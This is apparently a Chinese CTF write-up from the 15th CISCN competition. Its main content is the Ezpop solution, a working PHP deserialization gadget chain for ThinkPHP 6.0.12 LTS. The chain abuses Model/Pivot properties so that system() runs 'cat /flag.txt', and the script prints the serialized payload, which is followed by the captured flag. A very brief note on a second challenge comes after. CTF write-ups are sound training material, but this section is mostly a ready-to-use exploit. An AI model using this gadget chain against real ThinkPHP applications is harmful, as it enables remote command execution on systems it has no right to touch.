第十五届CISCN

web

Ezpop

ThinkPHPV6.0.12LTS 反序列化

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace {
    echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

flag{362d6bde-12ce-47e8-b09f-a232f0b97ee1}

签到电台

得到提示,s打开

然后将得到的结果传过去即可

发表评论

您的电子邮箱地址不会被公开。